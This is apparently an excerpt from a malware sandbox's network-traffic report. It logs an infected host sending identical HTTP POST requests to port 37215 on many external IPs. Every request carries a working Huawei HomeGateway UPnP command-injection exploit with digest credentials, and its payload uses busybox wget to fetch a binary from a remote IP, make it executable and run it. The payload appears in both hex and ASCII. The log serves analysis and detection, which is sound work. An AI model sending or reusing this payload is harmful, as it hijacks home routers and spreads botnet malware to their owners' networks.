                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              240192.168.2.1536150186.215.164.8337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.205527067 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              241192.168.2.1537650156.86.162.2537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.205595970 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              242192.168.2.1546858222.38.14.9337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.205605030 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              243192.168.2.1552072121.177.44.237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.205650091 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              244192.168.2.154775694.114.64.6437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.205651045 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              245192.168.2.1546970122.227.64.11037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.205651045 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              246192.168.2.1552576157.24.205.22337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.205651045 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              247192.168.2.1554294156.117.12.14637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.205652952 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              248192.168.2.1535420156.242.238.11037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.205655098 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              249192.168.2.1554598138.124.23.4137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.205703974 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
